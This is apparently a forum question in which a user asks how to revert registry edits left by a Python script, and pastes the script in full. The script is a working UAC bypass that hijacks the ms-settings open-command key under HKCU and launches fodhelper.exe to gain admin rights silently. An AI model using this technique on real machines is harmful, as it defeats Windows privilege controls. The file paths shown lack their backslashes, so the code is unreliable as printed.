How to undo regestry entries fro winreg in python?

  python, registry, winreg

I used a script that modifies the Windows Registry to run a Python program as admin (bypass UAC). But now I have a problem: when I use some Windows functions (like personalize my Desktop) it just trys to run the python code. So I want to undo the reg edits.

Here is the Code:

import os
import sys
import ctypes
import winreg


CMD                   = r"C:WindowsSystem32cmd.exe"

FOD_HELPER            = r'C:WindowsSystem32fodhelper.exe'

PYTHON_CMD            = "python"
REG_PATH              = 'SoftwareClassesms-settingsshellopencommand'

DELEGATE_EXEC_REG_KEY = 'DelegateExecute'

def is_running_as_admin():

    '''
    Checks if the script is running with administrative privileges.
    Returns True if is running as admin, False otherwise.
    '''    

    try:

        return ctypes.windll.shell32.IsUserAnAdmin()

    except:

        return False

def create_reg_key(key, value):

    '''
    Creates a reg key
    '''

    try:        

        winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)

        registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE)                

        winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)        

        winreg.CloseKey(registry_key)

    except WindowsError:        

        raise

def bypass_uac(cmd):

    '''
    Tries to bypass the UAC
    '''

    try:

        create_reg_key(DELEGATE_EXEC_REG_KEY, '')

        create_reg_key(None, cmd)    

    except WindowsError:

        raise


def execute():        

    if not is_running_as_admin():

        print ('[!] The script is NOT running with administrative privileges')

        print ('[+] Trying to bypass the UAC')

        try:                

            current_dir = os.path.dirname(os.path.realpath(__file__)) + '' + __file__

            cmd = '{} /k {} {}'.format(CMD, PYTHON_CMD, current_dir)

            bypass_uac(cmd)                

            os.system(FOD_HELPER)                

            sys.exit(0)                

        except WindowsError:

            sys.exit(1)

    else:

        print ('[+] The script is running with administrative privileges!')    


if __name__ == '__main__':

    execute()

And I want to undo the changes the code made. I tried to modify the Registry myself (admin) but it says I need permissions from an unknown user.

On any other Questions, Information or Error messages, please tell me.

Source: Python Questions

LEAVE A COMMENT